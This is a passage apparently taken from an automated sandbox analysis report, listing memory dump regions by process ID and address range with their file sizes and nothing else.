                                                                                                                                                                                                                                                                                                                              • memory/4704-324-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/4704-319-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/4704-349-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/4704-329-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/4704-353-0x00000000050F0000-0x00000000050F1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/4704-333-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/4704-335-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/4704-352-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/4704-336-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/4704-350-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/4704-340-0x0000000005050000-0x0000000005051000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/4704-341-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/4704-342-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/4704-344-0x0000000005080000-0x0000000005081000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/4704-348-0x00000000050B0000-0x00000000050B1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/4704-347-0x00000000050A0000-0x00000000050A1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/4708-230-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/4724-298-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/4748-381-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/4748-386-0x0000000000AB0000-0x0000000000AB1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/4748-390-0x0000000005320000-0x000000000534B000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                172KB

                                                                                                                                                                                                                                                                                                                              • memory/4764-236-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/4772-297-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/4792-239-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/4860-275-0x0000000002CD0000-0x0000000002CD9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                36KB

                                                                                                                                                                                                                                                                                                                              • memory/4860-242-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/4860-287-0x0000000000400000-0x0000000002C6A000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                40.4MB

                                                                                                                                                                                                                                                                                                                              • memory/4912-300-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/4912-307-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                                                                                                                              • memory/4912-311-0x00000000004A0000-0x00000000005EA000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                                                                                                              • memory/4916-283-0x0000000000400000-0x0000000002C81000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                40.5MB

                                                                                                                                                                                                                                                                                                                              • memory/4916-248-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/4916-273-0x0000000002DD0000-0x0000000002F1A000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                                                                                                              • memory/4924-382-0x0000000000240000-0x0000000000241000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                              • memory/4924-379-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/4924-385-0x0000000000970000-0x000000000099C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                176KB

                                                                                                                                                                                                                                                                                                                              • memory/4936-249-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/4936-282-0x0000000002CC0000-0x0000000002CCA000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                40KB

                                                                                                                                                                                                                                                                                                                              • memory/4940-318-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                80KB

                                                                                                                                                                                                                                                                                                                              • memory/4940-314-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/5056-369-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/5060-358-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/5064-363-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/5088-368-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/5092-260-0x00007FF6560E4060-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/5092-267-0x000002123D800000-0x000002123D874000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                464KB

                                                                                                                                                                                                                                                                                                                              • memory/5092-264-0x000002123D4C0000-0x000002123D50E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                312KB

                                                                                                                                                                                                                                                                                                                              • memory/5288-400-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/5300-401-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                              • memory/5300-404-0x0000000000400000-0x0000000000455000-memory.dmp
                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                340KB

                                                                                                                                                                                                                                                                                                                              • memory/5408-407-0x0000000000000000-mapping.dmp